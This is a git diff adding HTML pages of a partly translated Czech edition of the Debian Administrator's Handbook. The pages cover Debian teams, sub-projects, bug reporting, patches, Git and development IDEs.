+                href="https://lists.debian.org/i18n.html">https://lists.debian.org/i18n.html</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/international/">https://www.debian.org/international/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Co je to i18n a l10n?</strong></p></div></div></div><a
+              id="id-1.4.6.6.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.5"
+              class="indexterm"></a><div
+              class="para">
+				“i18n” a “l10n” jsou zkratky slov “internacionalizace” a “lokalizace”, respektive, ponechání prvního a posledního písmena z každého slova a počet písmen uprostřed.
+			</div><div
+              class="para">
+				“Internacionalizování” programu spočívá v jeho modifikaci, kdy může být přeložen (lokalizován). To obnáší částečné přepsání programu původně napsaného pro fungování v jednom jazyku za účelem možnosti jeho otevření ve všech jazycích.
+			</div><div
+              class="para">
+				“Lokalizace” programu spočívá v překladu původních zpráv (často v angličtině) do jiného jazyka. Abychom toho dosáhli, musí být již program internacializován.
+			</div><div
+              class="para">
+				Abychom to shrnuli, internacionalizace připravuje software pro překlad, který je potom spuštěn lokalizací.
+			</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.patch"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Patch, způsob zasílání oprav</strong></p></div></div></div><a
+              id="id-1.4.6.6.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.7.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.7.4"
+              class="indexterm"></a><div
+              class="para">
+				Patch je soubor popisující změny, které mají být provedeny na jednom nebo více odkazovaných souborech. Konkrétně, obsahuje seznam řádků k odstranění nebo přidání do kódu, stejně jako (někdy) řádky odebrané z referenčního textu, nahrazující modifikace v kontextu (umožňující identifikaci umístění změn, pokud čísla řádlů byla změněna).
+			</div><div
+              class="para">
+				Nástroj používaný pro uplatnění modifikací předávaných v takovém souboru je jednoduše nazýván <code
+                class="command">patch</code>. nástroj, který jej vytváří se jmenuje <code
+                class="command">diff</code> a používá se takto:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>diff -u file.old file.new &gt;file.patch</code></strong></pre><div
+              class="para">
+				Soubor <code
+                class="filename">file.patch</code> obsahuje instrukce pro provedení obsahových změn <code
+                class="filename">file.old</code> na <code
+                class="filename">file.new</code>. Můžeme jej poslat někomu, kdo jej dokáže použít k vytvoření <code
+                class="filename">file.new</code> z těch ostatních dvou, tímto způsobem:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>patch -p0 file.old &lt;file.patch</code></strong></pre><div
+              class="para">
+				Soubor, <code
+                class="filename">file.old</code>, je nyní identický s <code
+                class="filename">file.new</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span> Nahlásit chybu <code
+                        class="command">reportbugem</code></strong></p></div></div></div><a
+              id="id-1.4.6.6.8.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.8.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.8.4"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="command">reportbug</code> tool facilitates sending bug reports on a Debian package. It helps making sure the bug in question hasn't already been filed, thus preventing redundancy in the system. It reminds the user of the definitions of the severity levels, for the report to be as accurate as possible (the developer can always fine-tune these parameters later, if needed). It helps writing a complete bug report without the user needing to know the precise syntax, by writing it and allowing the user to edit it. This report will then be sent via an e-mail server (by default, a remote one run by Debian, but <code
+                class="command">reportbug</code> can also use a local server).
+			</div><div
+              class="para">
+				Tento nástroj se nejdříve zaměřuje na vývojové verze, což je místo, kde jsou chyby opraveny. V praxi nejsou chyby ve stabilní verzi Debianu vítány, s velmi málo vyjímkami pro bezpečnostní aktualizace nebo důležité aktualizace (pokud, například, balíček vůbec nefunguje). Náprava menší chyby v debianovském balíčku musí tak počkat na další stabilní verzi.
+			</div></div><div
+            class="para">
+				Všechny tyto příspěvkové mechanismy se stávají více efektivními díky chování uživatelů. Uživatelé jsou daleko tomu být skupinou izolovaných osob, jsou naopak komunitou, kde se spousta výměnných činností děje. Obzvláště sledujeme obdivuhodnou aktivitu na diskuzních emailových seznamech uživatelů, <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-user@lists.debian.org">debian-user@lists.debian.org</a></code> (<a
+              class="xref"
+              href="solving-problems.html">7 – „<em>Solving Problems and Finding Relevant Information</em>“</a> se tomu detailněji věnuje).
+			</div><div
+            class="para">
+				Nejen, že uživatelé pomáhají sobě (i ostatním) s technickými věcmi, které se jich bezprostředně týkají, ale také diskutují o nejlepších způsobech, jak přispět k debianovskému projektu a posunout jej dál - diskutování, které často vede k návrhům na vylepšení.
+			</div><div
+            class="para">
+				Protože Debian nevydává žádné prostředky na žádnou sebepropagační kampaň, jeho uživatelé hrají podstatnou roli v jeho rozšiřování a tím upevňování jeho věhlasu prostřednictvím osobních rozhovorů apod.
+			</div><div
+            class="para">
+				This method functions quite well, since Debian fans are found at all levels of the free software community: from install parties (workshops where seasoned users assist newcomers to install the system) organized by local LUGs or “Linux User Groups”, to association booths at large tech conventions dealing with Linux, etc.
+			</div><div
+            class="para">
+				Volunteers make posters, brochures, stickers, and other useful promotional materials for the project, which they make available to everyone, and which Debian provides freely on its website and on its wiki: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/events/material">https://www.debian.org/events/material</a></div>
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.7"></a>1.3.3. Týmy a podprojekty</h3></div></div></div><div
+            class="para">
+				Debian byl od samého počátku organizován kolem konceptu zdrojových balíčků, každý se svým správcem nebo skupinou správců. Časem se vytvořilo hodně pracovních týmů, zabezpečujících administrativu infrastruktury, řízení úkolů nepatřících k žádnému konlrétnímu balíčku (zajišťování kvality, zásady Debianu, instalace, apod.), spolu s posledními týmy, které vyrostly kolem podprojektů.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sub-projects"></a>1.3.3.1. Současné podprojekty Debianu</h4></div></div></div><div
+              class="para">
+					To each their own Debian! A sub-project is a group of volunteers interested in adapting Debian to specific needs. Beyond the selection of a sub-group of programs intended for a particular domain (education, medicine, multimedia creation, etc.), sub-projects are also involved in improving existing packages, packaging missing software, adapting the installer, creating specific documentation, and more.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Sub-project and derivative distribution</strong></p></div></div></div><a
+                id="id-1.4.6.7.3.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.3.3.3"
+                class="indexterm"></a><div
+                class="para">
+					The development process for a derivative distribution consists in starting with a particular version of Debian and making a number of modifications to it. The infrastructure used for this work is completely external to the Debian project. There isn't necessarily a policy for contributing improvements. This difference explains how a derivative distribution may “diverge” from its origins, and why they have to regularly resynchronize with their source in order to benefit from improvements made upstream.
+				</div><div
+                class="para">
+					On the other hand, a sub-project can not diverge, since all the work on it consists of directly improving Debian in order to adapt it to a specific goal.
+				</div><div
+                class="para">
+					The most known distribution derived from Debian is, without a doubt, Ubuntu, but there are many. See <a
+                  class="xref"
+                  href="derivative-distributions.html">A – „<em>Derivative Distributions</em>“</a> to learn about their particularities and their positioning in relationship to Debian.
+				</div></div><div
+              class="para">
+					Here is a small selection of current sub-projects:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Junior, by Ben Armstrong, offering an appealing and easy to use Debian system for children;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Edu, by Petter Reinholdtsen, focused on the creation of a specialized distribution for the academic world;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Med, by Andreas Tille, dedicated to the medical field;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Multimedia which deals with audio and multimedia work;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Desktop which focuses on the desktop and coordinates artwork for the default theme;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian GIS which takes care of Geographical Information Systems applications and users;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Accessibility, finally, improving Debian to match the requirements of people with disabilities.
+						</div></li></ul></div><div
+              class="para">
+					This list will most likely continue to grow with time and improved perception of the advantages of Debian sub-projects. Fully supported by the existing Debian infrastructure, they can, in effect, focus on work with real added value, without worrying about remaining synchronized with Debian, since they are developed within the project.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.6.7.4"></a>1.3.3.2. Administrative Teams</h4></div></div></div><div
+              class="para">
+					Most administrative teams are relatively closed and recruit only by cooptation. The best means to become a part of one is to intelligently assist the current members, demonstrating that you have understood their objectives and methods of operation.
+				</div><div
+              class="para">
+					The ftpmasters are in charge of the official archive of Debian packages. They maintain the program that receives packages sent by developers and automatically stores them, after some checks, on the reference server (<code
+                class="literal">ftp-master.debian.org</code>).
+				</div><div
+              class="para">
+					They must also verify the licenses of all new packages, in order to ensure that Debian may distribute them, prior to including them in the corpus of existing packages. When a developer wishes to remove a package, they address this team through the bug tracking system and the <span
+                class="emphasis"><em>ftp.debian.org</em></span> “pseudo-package”.
+				</div><a
+              id="id-1.4.6.7.4.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> The pseudo-package, a monitoring tool</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.6.2"
+                class="indexterm"></a><div
+                class="para">
+					The bug tracking system, initially designed to associate bug reports with a Debian package, has proved very practical to manage other matters: lists of problems to be resolved or tasks to manage without any link to a particular Debian package. The “pseudo-packages” allow, thus, certain teams to use the bug tracking system without associating a real package with their team. Everyone can, thus, report issues that needs to be dealt with. For instance, the BTS has a <span
+                  class="emphasis"><em>ftp.debian.org</em></span> entry that is used to report and track problems on the official package archive or simply to request removal of a package. Likewise, the <span
+                  class="emphasis"><em>www.debian.org</em></span> pseudo-package refers to errors on the Debian website, and <span
+                  class="emphasis"><em>lists.debian.org</em></span> gathers all the problems concerning the mailing lists.
+				</div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.gitlab"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> GitLab, Git repository hosting and much more</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.7.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.7.3"
+                class="indexterm"></a><div
+                class="para">
+					A GitLab instance, known as <code
+                  class="literal">salsa.debian.org</code>, is used by Debian to host the Git packaging repositories but this software offers much more than simple hosting and Debian contributors have been quick to leverage the continuous integration features (running tests, or even building packages, on each push). Debian contributors also benefit from a cleaner contribution workflow thanks the well understood merge request process (similar to GitHub's pull requests).
+				</div><div
+                class="para">
+					GitLab replaced FusionForge (which was running on a service known as <code
+                  class="literal">alioth.debian.org</code>) for collaborative package maintainance. This service is administered by Alexander Wirt, Bastian Blank and Jörg Jaspert. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://salsa.debian.org/">https://salsa.debian.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Salsa/Doc">https://wiki.debian.org/Salsa/Doc</a></div>
+				</div></div><div
+              class="para"><a
+                xmlns=""
+                id="dsa-team"></a>
+					The <span
+                class="emphasis"><em>Debian System Administrators</em></span> (DSA) team (<code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-admin@lists.debian.org">debian-admin@lists.debian.org</a></code>), as one might expect, is responsible for system administration of the many servers used by the project. They ensure optimal functioning of all base services (DNS, Web, e-mail, shell, etc.), install software requested by Debian developers, and take all precautions in regards to security. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://dsa.debian.org">https://dsa.debian.org</a></div>
+				</div><a
+              id="id-1.4.6.7.4.9"
+              class="indexterm"></a><a
+              id="id-1.4.6.7.4.10"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> Debian Package Tracker</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.11.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.3"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.4"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.5"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.6"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.7"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.8"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.9"
+                class="indexterm"></a><div
+                class="para">
+					This is one of Raphaël's creations. The basic idea is, for a given package, to centralize as much information as possible on a single page. Thus, one can quickly check the status of a program, identify tasks to be completed, and offer one's assistance. This is why this page gathers all bug statistics, available versions in each distribution, progress of a package in the <span
+                  class="distribution distribution">Testing</span> distribution, the status of translations of descriptions and debconf templates, the possible availability of a new upstream version, notices of noncompliance with the latest version of the Debian Policy, information on the maintainer, and any other information that said maintainer wishes to include. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://tracker.debian.org/">https://tracker.debian.org/</a></div>
+				</div><div
+                class="para">
+					An e-mail subscription service completes this web interface. It automatically sends the following selected information to the list: bugs and related discussions, availability of a new version on the Debian servers, new translations available for proofreading, etc.
+				</div><div
+                class="para">
+					Advanced users can, thus, follow all of this information closely and even contribute to the project, once they have got a good enough understanding of how it works.
+				</div><div
+                class="para">
+					Another web interface, known as <span
+                  class="emphasis"><em>Debian Developer's Packages Overview</em></span> (DDPO), provides each developer a synopsis of the status of all Debian packages placed under their charge. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://qa.debian.org/developer.php">https://qa.debian.org/developer.php</a></div>
+				</div><div
+                class="para">
+					These two websites are tools developed and managed by the group responsible for quality assurance within Debian (known as Debian QA).
+				</div><a
+                id="id-1.4.6.7.4.11.15"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.16"
+                class="indexterm"></a></div><div
+              class="para">
+					The <span
+                class="emphasis"><em>listmasters</em></span> administer the e-mail server that manages the mailing lists. They create new lists, handle bounces (delivery failure notices), and maintain spam filters (unsolicited bulk e-mail).
+				</div><a
+              id="id-1.4.6.7.4.13"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Traffic on the mailing lists: some figures</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.14.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.14.3"
+                class="indexterm"></a><div
+                class="para">
+					The mailing lists are, without a doubt, the best testimony to activity on a project, since they keep track of everything that happens. Some statistics (from 2017) regarding our mailing lists speak for themselves: Debian hosts more than 250 lists, totaling 217,000 individual subscriptions. The 27,000 messages sent each month generate 476,000 e-mails daily.
+				</div></div><div
+              class="para">
+					Each specific service has its own administration team, generally composed of volunteers who have installed it (and also frequently programmed the corresponding tools themselves). This is the case of the bug tracking system (BTS), the package tracker, <code
+                class="literal">salsa.debian.org</code> (GitLab server, see sidebar <a
+                class="xref"
+                href="sect.debian-internals.html#sidebar.gitlab"><span
+                  class="emphasis"><em>TOOL</em></span> GitLab, Git repository hosting and much more</a>), the services available on <code
+                class="literal">qa.debian.org</code>, <code
+                class="literal">lintian.debian.org</code>, <code
+                class="literal">buildd.debian.org</code>, <code
+                class="literal">cdimage.debian.org</code>, etc.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.6.7.5"></a>1.3.3.3. Development Teams, Transversal Teams</h4></div></div></div><div
+              class="para">
+					Unlike administrative teams, the development teams are rather widely open, even to outside contributors. Even if Debian does not have a vocation to create software, the project needs some specific programs to meet its goals. Of course, developed under a free software license, these tools make use of methods proven elsewhere in the free software world.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.git"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Git</strong></p></div></div></div><a
+                id="id-1.4.6.7.5.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.3"
+                class="indexterm"></a><div
+                class="para">
+					Git is a tool for collaborative work on multiple files, while maintaining a history of modifications. The files in question are generally text files, such as a program's source code. If several people work together on the same file, <code
+                  class="command">git</code> can only merge the alterations made if they were made to different portions of the file. Otherwise, these “conflicts” must be resolved by hand.
+				</div><div
+                class="para">
+					Git is a distributed system where each user has a repository with the complete history of changes. Central repositories are used to download the project (<code
+                  class="command">git clone</code>) and to share the work done with others (<code
+                  class="command">git push</code>). The repository can contain multiple versions of the files but only one version can be worked on at a given time: it's called the working copy (it can be changed to point to another version with <code
+                  class="command">git checkout</code>). Git can show you the modifications made to the working copy (<code
+                  class="command">git diff</code>), can store them in the repository by creating a new entry in the versions history (<code
+                  class="command">git commit</code>), can update the working copy to include modifications made in parallel by other users (<code
+                  class="command">git pull</code>), and can record a particular configuration in the history in order to be able to easily extract it later on (<code
+                  class="command">git tag</code>).
+				</div><div
+                class="para">
+					Git makes it easy to handle multiple concurrent versions of a project in development without them interfering with each other. These versions are called <span
+                  class="emphasis"><em>branches</em></span>. This metaphor of a tree is fairly accurate, since a program is initially developed on a common trunk. When a milestone has been reached (such as version 1.0), development continues on two branches: the development branch prepares the next major release, and the maintenance branch manages updates and fixes for version 1.0.
+				</div><a
+                id="id-1.4.6.7.5.3.7"
+                class="indexterm"></a><div
+                class="para">
+					Git is, nowadays, the most popular version control system but it is not the only one. Historically, CVS (Concurrent Versions System) was the first widely used tool but its numerous limitations contributed to the appearance of more modern free alternatives. These include, especially, <code
+                  class="command">subversion</code> (<code
+                  class="command">svn</code>), <code
+                  class="command">git</code>, <code
+                  class="command">bazaar</code> (<code
+                  class="command">bzr</code>), and <code
+                  class="command">mercurial</code> (<code
+                  class="command">hg</code>). <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.nongnu.org/cvs/">http://www.nongnu.org/cvs/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://subversion.apache.org/">http://subversion.apache.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://git-scm.com/">http://git-scm.com/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://bazaar.canonical.com/">http://bazaar.canonical.com/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://mercurial.selenic.com/">http://mercurial.selenic.com/</a></div>
+				</div><a
+                id="id-1.4.6.7.5.3.9"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.10"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.11"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.12"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.13"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.14"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.15"
+                class="indexterm"></a></div><div
+              class="para">
+					Debian has developed little software of its own, but certain programs have assumed a starring role, and their fame has spread beyond the scope of the project. Good examples are <code
+                class="command">dpkg</code>, the Debian package management program (it is, in fact, an abbreviation of Debian PacKaGe, and generally pronounced as “dee-package”), and <code
+                class="command">apt</code>, a tool to automatically install any Debian package, and its dependencies, guaranteeing the consistency of the system after an upgrade (its name is an acronym for Advanced Package Tool). Their teams are, however, much smaller, since a rather high level of programming skill is required to gain an overall understanding of the operations of these types of programs.
+				</div><div
+              class="para">
+					The most important team is probably that for the Debian installation program, <code
+                class="command">debian-installer</code>, which has accomplished a work of momentous proportions since its conception in 2001. Numerous contributors were needed, since it is difficult to write a single program able to install Debian on a dozen different architectures. Each one has its own mechanism for booting and its own bootloader. All of this work is coordinated on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-boot@lists.debian.org">debian-boot@lists.debian.org</a></code> mailing list, under the direction of Cyril Brulebois. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/devel/debian-installer/">http://www.debian.org/devel/debian-installer/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://joeyh.name/blog/entry/d-i_retrospective/">http://joeyh.name/blog/entry/d-i_retrospective/</a></div>
+				</div><div
+              class="para">
+					The (very small) <code
+                class="command">debian-cd</code> program team has an even more modest objective. Many “small” contributors are responsible for their architecture, since the main developer can not know all the subtleties, nor the exact way to start the installer from the CD-ROM.
+				</div><div
+              class="para">
+					Many teams must collaborate with others in the activity of packaging: <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-qa@lists.debian.org">debian-qa@lists.debian.org</a></code> tries, for example, to ensure quality at all levels of the Debian project. The <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code> list develops Debian Policy according to proposals from all over the place. The teams in charge of each architecture (<code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-architecture@lists.debian.org">debian-<em
+                    class="replaceable">architecture</em>@lists.debian.org</a></code>) compile all packages, adapting them to their particular architecture, if needed.
+				</div><div
+              class="para">
+					Other teams manage the most important packages in order to ensure maintenance without placing too heavy a load on a single pair of shoulders; this is the case with the C library and <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-glibc@lists.debian.org">debian-glibc@lists.debian.org</a></code>, the C compiler on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-gcc@lists.debian.org">debian-gcc@lists.debian.org</a></code> list, or Xorg on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-x@lists.debian.org">debian-x@lists.debian.org</a></code> (this group is also known as the X Strike Force).
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.foundation-documents.html"><strong>Předcházející</strong>1.2. Dokumenty nadace</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.follow-debian-news.html"><strong>Další</strong>1.4. Follow Debian News</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html
new file mode 100644
index 000000000..9a80ee23c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.development.html
@@ -0,0 +1,126 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.6. Development</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.web-browsers.html"
+        title="13.5. Web Browsers" /><link
+        rel="next"
+        href="sect.collaborative-work.html"
+        title="13.7. Collaborative Work" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.development.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.web-browsers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.collaborative-work.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.development"></a>13.6. Development</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.9.2"></a>13.6.1. Tools for GTK+ on GNOME</h3></div></div></div><div
+            class="para">
+				Anjuta (in the <span
+              class="pkg pkg">anjuta</span> package) and GNOME Builder (in the <span
+              class="pkg pkg">gnome-builder</span> package) are Integrated Development Environments (<acronym
+              class="acronym">IDE</acronym>) optimized for creating GTK+ applications for GNOME. Glade (in the <span
+              class="pkg pkg">glade</span> package) is an application designed to create GTK+ graphical interfaces for GNOME and save them in an XML file. These XML files can then be loaded by the GTK+ shared library though its <code
+              class="literal">GtkBuilder</code> component to recreate the saved interfaces; such a feature can be interesting, for instance for plugins that require dialogs. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.gnome.org/Apps/Builder">https://wiki.gnome.org/Apps/Builder</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://anjuta.org/">http://anjuta.org/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://glade.gnome.org/">https://glade.gnome.org/</a></div>
+			</div><a
+            id="id-1.16.9.2.3"
+            class="indexterm"></a><a
+            id="id-1.16.9.2.4"
+            class="indexterm"></a><a
+            id="id-1.16.9.2.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.9.3"></a>13.6.2. Tools for Qt</h3></div></div></div><div
+            class="para">
+				The equivalent applications for Qt applications are KDevelop by KDE (in the <span
+              class="pkg pkg">kdevelop</span> package) for the development environment, and Qt Designer (in the <span
+              class="pkg pkg">qttools5-dev-tools</span> package) for the design of graphical interfaces for Qt applications.
+			</div><div
+            class="para">
+				KDevelop is also a generic IDE and provides plugins for other languages like Python and PHP and different build systems.
+			</div><a
+            id="id-1.16.9.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.9.3.5"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.web-browsers.html"><strong>Předcházející</strong>13.5. Web Browsers</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.collaborative-work.html"><strong>Další</strong>13.7. Collaborative Work</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html
new file mode 100644
index 000000000..17a191cdd
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.devuan.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.9. Devuan</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
